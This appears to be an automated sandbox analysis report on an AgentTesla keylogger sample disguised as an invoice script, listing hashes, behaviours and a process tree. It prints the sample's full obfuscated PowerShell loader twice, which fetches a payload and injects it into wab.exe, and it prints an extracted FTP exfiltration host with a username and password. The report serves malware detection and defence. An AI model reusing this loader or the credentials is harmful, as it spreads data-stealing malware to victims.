Overview

overview

10

Static

static

1

invoice pdf.wsf

windows7-x64

10

invoice pdf.wsf

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-04-2024 15:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    invoice pdf.wsf

  • Size

    54KB

  • MD5

    5f34914e10cbab186d1b209265e2ea51

  • SHA1

    61e57fe5b455954d5727748e8b9046d3d558bc6f

  • SHA256

    cd80d457405b27e9c6834f4d3e952fb3739bec5c4839e53dca134d5885d21438

  • SHA512

    7ec53b06de022504e3495fd5976cc370a6910cbb7ee96ca7564b0b9c3d370140b3b15dd59652b37ff89ea8edc40700010b09c89425b786a514102c221d870cce

  • SSDEEP

    768:iBT2p/fwNaKj7gHrI0i3wPDPM+A0s2hyOX0Q4afFysrmUYAYB8nq7ralHdYiShF:iBgukLI1gPDPTxyk0MfFCNqnrHdKhF

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.concaribe.com
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    ro}UWgz#!38E

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice pdf.wsf"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3372
    • C:\Windows\System32\ping.exe
      ping google.com -n 1
      2⤵
      • Runs ping.exe
      PID:864
    • C:\Windows\System32\ping.exe
      ping %.%.%.%
      2⤵
      • Runs ping.exe
      PID:1632
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c dir
      2⤵
        PID:1052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Strychnina = 1;$Dentallaboratoriet='Substrin';$Dentallaboratoriet+='g';Function Phthises18($Brstfldigt){$Supplere=$Brstfldigt.Length-$Strychnina;For($Windbaggery=5; $Windbaggery -lt $Supplere; $Windbaggery+=(6)){$Atria+=$Brstfldigt.$Dentallaboratoriet.Invoke($Windbaggery, $Strychnina);}$Atria;}function Stofmassen($Demipremise){. ($Flagermuselygters) ($Demipremise);}$Coincided=Phthises18 'MdregMNapolo Sa szDaleniradislGallnlBor.kaAlarm/ Race5Homel.inde 0Hujen kamac(M steWInsemi.lbinnEfterd,arato ErotwPerizs Er,v L.mmNDim.dTLeuko Skri.1Rubio0Perid.Inds,0Misbi;.dnbb TavsmW KonsiOverenCot r6Jagtl4Calvi;A ora Late xreall6Reskn4Starc;Marsh Priorr Saddv Alge:bes j1 Xyl.2 Anis1Lesgh. ,ill0Co.tr)Vold Pref,G Konte HolocFrelskSanktoDatte/R inc2Ri.ra0Talom1Neote0Uflso0Polit1Black0Hi.ch1pater .uzzlFJustii.ridtr Un teGtemafSquilo.aresxvanfr/seern1Lystp2Stor,1 Omd..Graps0Irans ';$Eftersporet=Phthises18 'LigesUAllias ScoreIm,unr,oque-PeripA Profg Cem.eDomban Ga,etana.t ';$Raadplanter=Phthises18 'Apludh Scort ellet OverpCalva:Nedst/Tas e/Hydroa lgentCelesoMejerrBee edPo,eseAandegnonr,.DioxicDustcoClon,mPanpo.S ndeb Nit rAga,s/ Dispn Cam nOzonanElsha/BaadeAPolarmGelatpendothepigriDerivoSamhrxPl.omuFabris,undu. Linim umerdvedblpHvl.n ';$Hyperangelic=Phthises18 'Gnas >Sydla ';$Flagermuselygters=Phthises18 'IndbiiNahare Tipix for ';$Detektorernes47='Brotchen';Stofmassen (Phthises18 'GledeSSvmmee ScletRek.l-ScirrCFo.udoUl.sgnBlksttDia ne Sat nDec.itUds.g alrun- UnfiPSnedka Lumst .ebrhTrovr Ple rTMelbo:Borgm\SrintHMetalg ,ygdtNrtag8 Line2Nonre.GodketRi,auxDeasstprowl Tyks-PlanlVcartoanutril.rediu FordeBegyn Gaus$ NonsDKnotte Infit Bible D.ndkferiet,nrenoSpecir Spi.eM,psur HoecnTrafieR aolsGarg.4Maane7Fiend;Rigsr ');Stofmassen (Phthises18 'DupniiDdsscfPbel. Kris ( Mu,ktUnco.e.artbs,ktietAak n-Ag,ncpAutobaOutbatF,eudhJukeb ,tillTOsmol:Distr\ sn.uHLott gCeourtHeste8Clien2Forfa. LufttAnglixSexkutRest,)T,rac{AgaoneForhex SpeciFest,tJordf}Ballo;,rghe ');$tamtamers = Phthises18 ' eline.lbskcCapachUnpicoMa.su Me lm%Al itaUnde,pStrappS,terdKr,dsaO,redt Ki ha .ice%,rhaa\T.ggecExpecyBailppunsprr PunciMaartn ActioTinctiDomindAan,e.carieM Ind aSekuns Lust Alter&Ichth& Thr, Sku.aeSyvencPuntahTizzioU sag Ud,i$Andet ';Stofmassen (Phthises18 ',ooth$Br.vug FolklGrundoBli.kb MistaHeterlSelvr:Me zoPpartnoStadfdChanczStrego Vensl KohriSvendzF.endaRegoltCarquiTahseo.agdknO,iga=Diplo( Flj c M.ndm Ul idDrabb Pagan/tyndbc Bran Ggep$W,odht histaRundemR kettSpadea f.uim trane rincrSkraassawtf)Acr,s ');Stofmassen (Phthises18 'Elsha$ I,dhg Ka,tlno deo Besob ProtaGe rilUsa.t:RemagSLatinuPoly bPrelocNormaoMoroxsPapintDurupa Ant,eNed,s2 Midd3a,ret2 Gyps=hy er$K,llaRFlotoaSteamaU readKonj,prvrenlLateraS,uppn SulitNormaeScalprSecer.AftersGetssp GrealJvndgi Fernt O.ib(procu$.onfeHResmoypretepSepare.liger amzaaInkamnCerebgBugfie Conslteglvialkalc ulti) Bort ');$Raadplanter=$Subcostae232[0];Stofmassen (Phthises18 'Ul.mp$EftergHandbl ParkoBegrdbContaa RenglMugni:ped.lUPeri,nInvarr Sa miVvebovM iosa OcealFds,llgopleiStukknS egegC oon= Lse.NBar.leUnk nwerhve-Dec,nOCrotobUteroj Fo reBrabscUlveht Pall J rdSHundeyForsasFngsetGhouleKnkkemMal b.OvulaNZincieJegl,tKinki. UnhaWUnl teSequebOrie CBogtrl RniciFly oeU.ridnm,rdyt,ubli ');Stofmassen (Phthises18 'bekil$ StocUheartn.jstrrMagneiRevolv PersaTi melGu.sslB,ygniSt.alnbeamigBur,c. KikrHSa gse Wil,aoptandT urieCockerstra.s beto[Prpos$ Bu,tE,tirif PolitOpegreBi.olr,eends Ben p U,troRevyerSubskeEpidetDegam]Prese=Se im$ QuitCReda,oSo.epiKontonReimpc,rgumi SuprdGibbeePublidMedji ');$Alodification=Phthises18 ' KersUBenzpn Ove rD,scui BehrvJurisaBidtglGuestl.ondeiMolernAs isgGyest.mottsDTunneoTetanwSublan versl ProcoE,roza Dappd,astnFHjsl i SamvlHabsbeFors.(Effek$transRSkovfaGodm,aMajd d StenpPurpllFrostaUnbrin Balgttremae EgisrBogey,Assiz$De.onUBru bnGk,nttDahliaHovnerFo lirDrifty F ltiEmulanSalutgS.per)Redef ';$Alodification=$Podzolization[1]+$Alodification;$Untarrying=$Podzolization[0];Stofmassen (Phthises18 'Nstmi$To.vtgPuttylSociooGothebdisseaG anglTredj:Agallb H rdlSammeiyuppimWiwidp PanfsSkrig= uksb(tilfoTFiksaeTjen ss.nsktMorgu- ApolPUndera.zardt SpilhLynns .tav$JodtiUBevisn FreetOpkrsaAbstirProt.rTi.iayNettoi Tar,nBravugSkrif)Til e ');while (!$blimps) {Stofmassen (Phthises18 ' undo$GavlegNonfilUddeloSubgrbCesara AttrlForel:RessoEDisconIgangeBoonepCirsoiT,lefgUdkmpeKe,nsrA gelnlegegeL dsts Ta r= Ar,a$Sgetet ,ivsr Kognu Iltieb.and ') ;Stofmassen $Alodification;Stofmassen (Phthises18 'NattiSOrselt Terra.phror RetmtForp,-FraseSTamarlLgeuneEntrae Xantp Geng Urine4Dis u ');Stofmassen (Phthises18 'coile$SemiagBovoilPdiatoHyperbP ngaaF,rvalIdent:forbubTidoblUgaliiPassimBistrpUndersBacte=Und.r(AspouTsk ttePrei sEftertMo,ge-b ligP B,ita TurrtAntichOverk Flor$FendeU nsaan lisstUnr maInvenr Chirr .uady Fle iF ottnDoridgUptow) p,do ') ;Stofmassen (Phthises18 'Ta be$An,omgsternl,onenoVerd bLevesa ForslDe fi:Ve.trOEp,nasBrndeaCanzo=tornt$Bredygdep rlStenroBrnerbCo poaUnchal Afsa:FarraLLicitsUnkine.ubmuvCyto,aPacucnSei,msSystekOppuseO.tmalHul.biPlaceg KardhForskeMalp d ppreeRengrnGeys,+P,oto+ U.in%Forzi$AntitSSpa sum,tvab SamlcInte.oBraggs.evbnt Irrea TilkeLeget2 Logi3 Akro2Antic. BlitcMucedoTovtru KradnGastrtCh.fk ') ;$Raadplanter=$Subcostae232[$Osa];}Stofmassen (Phthises18 ' rude$Gly ggC rralpolymoHarpnbNo seaDyr.elSumma:Propow GoodaBac.er .aktsSk malDemiceGaultd Prci Sid e=Eupit CloseGkabareHretitOpp.s-Noto.CUndero aasnDrivgtNoneqenedisnsolidtModer Meta$adeneU MaronSvig,tSvovlaAllosrCountrGripeyTraceiUnfrun Mackg Spi. ');Stofmassen (Phthises18 'Nonfo$Prot g Fagblund loEi,ysbFrdigaOverblChamr:DdsdaC L.ddaTremonLeuciaTyranr ngres Ty,sePsycheI,dse Kerma=Influ kdb a[SlougSBuiltyUnprosFeebltAflsee OccumCotto.ShrevCVoldgo,pilonPostav ChareFerrirSbefatPauli]minde:Const:Br.ilFForthrQuadroFuldhmRevisBAnat.aK dess MedieIrred6Ch kr4ScrewSBrusktDelagrSprogiAb urnBestvgstats(Pedip$ Tr gwHa ndaUncrir.ersisContrlDusineZootedMonot)Dime. ');Stofmassen (Phthises18 'Uncan$Copeng Un.nlBoar oHydrab eseeaUdsiglReson:TykstaRaglerCradlrUnaccaIraneyVascumStylte .oadn FdsetAttes somno= Anti Shift[SatsfSEarsoyIn,sesAntastSku,seUl,gem ,oli.Sm sgTPol.ge SensxProgrtInd,j. SpriE,lyvenErobrcUsurpo.ruggdKloakiTheodnInde,g Nanz]start:Kamar: tortAFooliSsum eCU,cenIRestoIR dra.BiocoGLehare,atintStillSKreditWitlorA,nabi RedonNormag Medi( Orie$Sta sCPrsteaAlfa,n AlloaPlat,rSharpsStaateGenree Unde)Regio ');Stofmassen (Phthises18 'Rep e$figetg ervilLufttoTyranbKnallaSl mplMilie: compPNonacnconfieChaftuDeinomPancroEstv n B dteCircucMampatNautio BlaamStyl,iAeroseNecrosFj,ss=Dosm.$ AdseaPhener Po.erRasteaasgeryBesugmDecaieTempenFlodbt rvre. TilssAfstau C mebForets Windtgol ir InfeiTr ven Indkg ermo( Mad,3 Ekse3Udluf5Kegle5So.hi4Ynded6S,rmt, Nrin2Antiw7Spids6p.rre2Essen9Ru,ic) Tuss ');Stofmassen $Pneumonectomies;"
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2028
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "echo %appdata%\cyprinoid.Mas && echo $"
          3⤵
            PID:380
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Strychnina = 1;$Dentallaboratoriet='Substrin';$Dentallaboratoriet+='g';Function Phthises18($Brstfldigt){$Supplere=$Brstfldigt.Length-$Strychnina;For($Windbaggery=5; $Windbaggery -lt $Supplere; $Windbaggery+=(6)){$Atria+=$Brstfldigt.$Dentallaboratoriet.Invoke($Windbaggery, $Strychnina);}$Atria;}function Stofmassen($Demipremise){. ($Flagermuselygters) ($Demipremise);}$Coincided=Phthises18 'MdregMNapolo Sa szDaleniradislGallnlBor.kaAlarm/ Race5Homel.inde 0Hujen kamac(M steWInsemi.lbinnEfterd,arato ErotwPerizs Er,v L.mmNDim.dTLeuko Skri.1Rubio0Perid.Inds,0Misbi;.dnbb TavsmW KonsiOverenCot r6Jagtl4Calvi;A ora Late xreall6Reskn4Starc;Marsh Priorr Saddv Alge:bes j1 Xyl.2 Anis1Lesgh. ,ill0Co.tr)Vold Pref,G Konte HolocFrelskSanktoDatte/R inc2Ri.ra0Talom1Neote0Uflso0Polit1Black0Hi.ch1pater .uzzlFJustii.ridtr Un teGtemafSquilo.aresxvanfr/seern1Lystp2Stor,1 Omd..Graps0Irans ';$Eftersporet=Phthises18 'LigesUAllias ScoreIm,unr,oque-PeripA Profg Cem.eDomban Ga,etana.t ';$Raadplanter=Phthises18 'Apludh Scort ellet OverpCalva:Nedst/Tas e/Hydroa lgentCelesoMejerrBee edPo,eseAandegnonr,.DioxicDustcoClon,mPanpo.S ndeb Nit rAga,s/ Dispn Cam nOzonanElsha/BaadeAPolarmGelatpendothepigriDerivoSamhrxPl.omuFabris,undu. Linim umerdvedblpHvl.n ';$Hyperangelic=Phthises18 'Gnas >Sydla ';$Flagermuselygters=Phthises18 'IndbiiNahare Tipix for ';$Detektorernes47='Brotchen';Stofmassen (Phthises18 'GledeSSvmmee ScletRek.l-ScirrCFo.udoUl.sgnBlksttDia ne Sat nDec.itUds.g alrun- UnfiPSnedka Lumst .ebrhTrovr Ple rTMelbo:Borgm\SrintHMetalg ,ygdtNrtag8 Line2Nonre.GodketRi,auxDeasstprowl Tyks-PlanlVcartoanutril.rediu FordeBegyn Gaus$ NonsDKnotte Infit Bible D.ndkferiet,nrenoSpecir Spi.eM,psur HoecnTrafieR aolsGarg.4Maane7Fiend;Rigsr ');Stofmassen (Phthises18 'DupniiDdsscfPbel. Kris ( Mu,ktUnco.e.artbs,ktietAak n-Ag,ncpAutobaOutbatF,eudhJukeb ,tillTOsmol:Distr\ sn.uHLott gCeourtHeste8Clien2Forfa. LufttAnglixSexkutRest,)T,rac{AgaoneForhex SpeciFest,tJordf}Ballo;,rghe ');$tamtamers = Phthises18 ' eline.lbskcCapachUnpicoMa.su Me lm%Al itaUnde,pStrappS,terdKr,dsaO,redt Ki ha .ice%,rhaa\T.ggecExpecyBailppunsprr PunciMaartn ActioTinctiDomindAan,e.carieM Ind aSekuns Lust Alter&Ichth& Thr, Sku.aeSyvencPuntahTizzioU sag Ud,i$Andet ';Stofmassen (Phthises18 ',ooth$Br.vug FolklGrundoBli.kb MistaHeterlSelvr:Me zoPpartnoStadfdChanczStrego Vensl KohriSvendzF.endaRegoltCarquiTahseo.agdknO,iga=Diplo( Flj c M.ndm Ul idDrabb Pagan/tyndbc Bran Ggep$W,odht histaRundemR kettSpadea f.uim trane rincrSkraassawtf)Acr,s ');Stofmassen (Phthises18 'Elsha$ I,dhg Ka,tlno deo Besob ProtaGe rilUsa.t:RemagSLatinuPoly bPrelocNormaoMoroxsPapintDurupa Ant,eNed,s2 Midd3a,ret2 Gyps=hy er$K,llaRFlotoaSteamaU readKonj,prvrenlLateraS,uppn SulitNormaeScalprSecer.AftersGetssp GrealJvndgi Fernt O.ib(procu$.onfeHResmoypretepSepare.liger amzaaInkamnCerebgBugfie Conslteglvialkalc ulti) Bort ');$Raadplanter=$Subcostae232[0];Stofmassen (Phthises18 'Ul.mp$EftergHandbl ParkoBegrdbContaa RenglMugni:ped.lUPeri,nInvarr Sa miVvebovM iosa OcealFds,llgopleiStukknS egegC oon= Lse.NBar.leUnk nwerhve-Dec,nOCrotobUteroj Fo reBrabscUlveht Pall J rdSHundeyForsasFngsetGhouleKnkkemMal b.OvulaNZincieJegl,tKinki. UnhaWUnl teSequebOrie CBogtrl RniciFly oeU.ridnm,rdyt,ubli ');Stofmassen (Phthises18 'bekil$ StocUheartn.jstrrMagneiRevolv PersaTi melGu.sslB,ygniSt.alnbeamigBur,c. KikrHSa gse Wil,aoptandT urieCockerstra.s beto[Prpos$ Bu,tE,tirif PolitOpegreBi.olr,eends Ben p U,troRevyerSubskeEpidetDegam]Prese=Se im$ QuitCReda,oSo.epiKontonReimpc,rgumi SuprdGibbeePublidMedji ');$Alodification=Phthises18 ' KersUBenzpn Ove rD,scui BehrvJurisaBidtglGuestl.ondeiMolernAs isgGyest.mottsDTunneoTetanwSublan versl ProcoE,roza Dappd,astnFHjsl i SamvlHabsbeFors.(Effek$transRSkovfaGodm,aMajd d StenpPurpllFrostaUnbrin Balgttremae EgisrBogey,Assiz$De.onUBru bnGk,nttDahliaHovnerFo lirDrifty F ltiEmulanSalutgS.per)Redef ';$Alodification=$Podzolization[1]+$Alodification;$Untarrying=$Podzolization[0];Stofmassen (Phthises18 'Nstmi$To.vtgPuttylSociooGothebdisseaG anglTredj:Agallb H rdlSammeiyuppimWiwidp PanfsSkrig= uksb(tilfoTFiksaeTjen ss.nsktMorgu- ApolPUndera.zardt SpilhLynns .tav$JodtiUBevisn FreetOpkrsaAbstirProt.rTi.iayNettoi Tar,nBravugSkrif)Til e ');while (!$blimps) {Stofmassen (Phthises18 ' undo$GavlegNonfilUddeloSubgrbCesara AttrlForel:RessoEDisconIgangeBoonepCirsoiT,lefgUdkmpeKe,nsrA gelnlegegeL dsts Ta r= Ar,a$Sgetet ,ivsr Kognu Iltieb.and ') ;Stofmassen $Alodification;Stofmassen (Phthises18 'NattiSOrselt Terra.phror RetmtForp,-FraseSTamarlLgeuneEntrae Xantp Geng Urine4Dis u ');Stofmassen (Phthises18 'coile$SemiagBovoilPdiatoHyperbP ngaaF,rvalIdent:forbubTidoblUgaliiPassimBistrpUndersBacte=Und.r(AspouTsk ttePrei sEftertMo,ge-b ligP B,ita TurrtAntichOverk Flor$FendeU nsaan lisstUnr maInvenr Chirr .uady Fle iF ottnDoridgUptow) p,do ') ;Stofmassen (Phthises18 'Ta be$An,omgsternl,onenoVerd bLevesa ForslDe fi:Ve.trOEp,nasBrndeaCanzo=tornt$Bredygdep rlStenroBrnerbCo poaUnchal Afsa:FarraLLicitsUnkine.ubmuvCyto,aPacucnSei,msSystekOppuseO.tmalHul.biPlaceg KardhForskeMalp d ppreeRengrnGeys,+P,oto+ U.in%Forzi$AntitSSpa sum,tvab SamlcInte.oBraggs.evbnt Irrea TilkeLeget2 Logi3 Akro2Antic. BlitcMucedoTovtru KradnGastrtCh.fk ') ;$Raadplanter=$Subcostae232[$Osa];}Stofmassen (Phthises18 ' rude$Gly ggC rralpolymoHarpnbNo seaDyr.elSumma:Propow GoodaBac.er .aktsSk malDemiceGaultd Prci Sid e=Eupit CloseGkabareHretitOpp.s-Noto.CUndero aasnDrivgtNoneqenedisnsolidtModer Meta$adeneU MaronSvig,tSvovlaAllosrCountrGripeyTraceiUnfrun Mackg Spi. ');Stofmassen (Phthises18 'Nonfo$Prot g Fagblund loEi,ysbFrdigaOverblChamr:DdsdaC L.ddaTremonLeuciaTyranr ngres Ty,sePsycheI,dse Kerma=Influ kdb a[SlougSBuiltyUnprosFeebltAflsee OccumCotto.ShrevCVoldgo,pilonPostav ChareFerrirSbefatPauli]minde:Const:Br.ilFForthrQuadroFuldhmRevisBAnat.aK dess MedieIrred6Ch kr4ScrewSBrusktDelagrSprogiAb urnBestvgstats(Pedip$ Tr gwHa ndaUncrir.ersisContrlDusineZootedMonot)Dime. ');Stofmassen (Phthises18 'Uncan$Copeng Un.nlBoar oHydrab eseeaUdsiglReson:TykstaRaglerCradlrUnaccaIraneyVascumStylte .oadn FdsetAttes somno= Anti Shift[SatsfSEarsoyIn,sesAntastSku,seUl,gem ,oli.Sm sgTPol.ge SensxProgrtInd,j. SpriE,lyvenErobrcUsurpo.ruggdKloakiTheodnInde,g Nanz]start:Kamar: tortAFooliSsum eCU,cenIRestoIR dra.BiocoGLehare,atintStillSKreditWitlorA,nabi RedonNormag Medi( Orie$Sta sCPrsteaAlfa,n AlloaPlat,rSharpsStaateGenree Unde)Regio ');Stofmassen (Phthises18 'Rep e$figetg ervilLufttoTyranbKnallaSl mplMilie: compPNonacnconfieChaftuDeinomPancroEstv n B dteCircucMampatNautio BlaamStyl,iAeroseNecrosFj,ss=Dosm.$ AdseaPhener Po.erRasteaasgeryBesugmDecaieTempenFlodbt rvre. TilssAfstau C mebForets Windtgol ir InfeiTr ven Indkg ermo( Mad,3 Ekse3Udluf5Kegle5So.hi4Ynded6S,rmt, Nrin2Antiw7Spids6p.rre2Essen9Ru,ic) Tuss ');Stofmassen $Pneumonectomies;"
            3⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:724
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\cyprinoid.Mas && echo $"
              4⤵
                PID:3340
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                4⤵
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4780
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3940 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8
          1⤵
            PID:884

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5hl12qlc.p1x.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit
          • C:\Users\Admin\AppData\Roaming\cyprinoid.Mas
            Filesize

            472KB

            MD5

            1e0fb850c775bfca8e3b932d3e51d655

            SHA1

            4625de94a698f7103cd76a31067e37a19003c2fa

            SHA256

            02f8dc8c6426367b239a853f79b408b349c09b3fe102f95f3c060502b51338b7

            SHA512

            6c5dc1a15e8e8256078f4bd7e0fb5463fc3164519265dd0414740eedbbe3eb843128874b7749fc0523a56fcc442d79cac3f25adab23470c156bc4c5011937766

            Download Submit
          • memory/724-22-0x0000000005980000-0x00000000059A2000-memory.dmp
            Filesize

            136KB

            Download
          • memory/724-38-0x0000000008210000-0x000000000888A000-memory.dmp
            Filesize

            6.5MB

            Download
          • memory/724-44-0x0000000003170000-0x0000000003180000-memory.dmp
            Filesize

            64KB

            Download
          • memory/724-53-0x0000000076F81000-0x00000000770A1000-memory.dmp
            Filesize

            1.1MB

            Download
          • memory/724-16-0x0000000074560000-0x0000000074D10000-memory.dmp
            Filesize

            7.7MB

            Download
          • memory/724-52-0x0000000003170000-0x0000000003180000-memory.dmp
            Filesize

            64KB

            Download
          • memory/724-19-0x0000000003020000-0x0000000003056000-memory.dmp
            Filesize

            216KB

            Download
          • memory/724-18-0x0000000003170000-0x0000000003180000-memory.dmp
            Filesize

            64KB

            Download
          • memory/724-51-0x0000000003170000-0x0000000003180000-memory.dmp
            Filesize

            64KB

            Download
          • memory/724-21-0x0000000005B00000-0x0000000006128000-memory.dmp
            Filesize

            6.2MB

            Download
          • memory/724-50-0x0000000003170000-0x0000000003180000-memory.dmp
            Filesize

            64KB

            Download
          • memory/724-23-0x00000000061A0000-0x0000000006206000-memory.dmp
            Filesize

            408KB

            Download
          • memory/724-24-0x0000000006280000-0x00000000062E6000-memory.dmp
            Filesize

            408KB

            Download
          • memory/724-34-0x00000000063B0000-0x0000000006704000-memory.dmp
            Filesize

            3.3MB

            Download
          • memory/724-35-0x00000000069F0000-0x0000000006A0E000-memory.dmp
            Filesize

            120KB

            Download
          • memory/724-36-0x0000000006A30000-0x0000000006A7C000-memory.dmp
            Filesize

            304KB

            Download
          • memory/724-48-0x00000000093F0000-0x000000000D771000-memory.dmp
            Filesize

            67.5MB

            Download
          • memory/724-58-0x0000000074560000-0x0000000074D10000-memory.dmp
            Filesize

            7.7MB

            Download
          • memory/724-39-0x0000000006EF0000-0x0000000006F0A000-memory.dmp
            Filesize

            104KB

            Download
          • memory/724-40-0x0000000007C70000-0x0000000007D06000-memory.dmp
            Filesize

            600KB

            Download
          • memory/724-41-0x0000000007C00000-0x0000000007C22000-memory.dmp
            Filesize

            136KB

            Download
          • memory/724-42-0x0000000008E40000-0x00000000093E4000-memory.dmp
            Filesize

            5.6MB

            Download
          • memory/724-45-0x0000000074560000-0x0000000074D10000-memory.dmp
            Filesize

            7.7MB

            Download
          • memory/724-47-0x0000000007F20000-0x0000000007F21000-memory.dmp
            Filesize

            4KB

            Download
          • memory/724-37-0x0000000003170000-0x0000000003180000-memory.dmp
            Filesize

            64KB

            Download
          • memory/724-46-0x0000000003170000-0x0000000003180000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2028-11-0x000001ADCDAA0000-0x000001ADCDAB0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2028-10-0x00007FF984460000-0x00007FF984F21000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/2028-0-0x000001ADB53A0000-0x000001ADB53C2000-memory.dmp
            Filesize

            136KB

            Download
          • memory/2028-20-0x000001ADCDAA0000-0x000001ADCDAB0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2028-17-0x00007FF984460000-0x00007FF984F21000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/2028-13-0x000001ADCDAA0000-0x000001ADCDAB0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2028-12-0x000001ADCDAA0000-0x000001ADCDAB0000-memory.dmp
            Filesize

            64KB

            Download
          • memory/2028-63-0x00007FF984460000-0x00007FF984F21000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/4780-71-0x0000000074560000-0x0000000074D10000-memory.dmp
            Filesize

            7.7MB

            Download
          • memory/4780-57-0x0000000076F81000-0x00000000770A1000-memory.dmp
            Filesize

            1.1MB

            Download
          • memory/4780-60-0x0000000074560000-0x0000000074D10000-memory.dmp
            Filesize

            7.7MB

            Download
          • memory/4780-59-0x0000000001230000-0x0000000001272000-memory.dmp
            Filesize

            264KB

            Download
          • memory/4780-56-0x0000000001230000-0x0000000002484000-memory.dmp
            Filesize

            18.3MB

            Download
          • memory/4780-64-0x0000000022620000-0x0000000022630000-memory.dmp
            Filesize

            64KB

            Download
          • memory/4780-55-0x0000000076F81000-0x00000000770A1000-memory.dmp
            Filesize

            1.1MB

            Download
          • memory/4780-66-0x0000000024C80000-0x0000000024CD0000-memory.dmp
            Filesize

            320KB

            Download
          • memory/4780-67-0x0000000024D70000-0x0000000024E02000-memory.dmp
            Filesize

            584KB

            Download
          • memory/4780-68-0x0000000024C70000-0x0000000024C7A000-memory.dmp
            Filesize

            40KB

            Download
          • memory/4780-54-0x0000000077008000-0x0000000077009000-memory.dmp
            Filesize

            4KB

            Download
          • memory/4780-72-0x0000000022620000-0x0000000022630000-memory.dmp
            Filesize

            64KB

            Download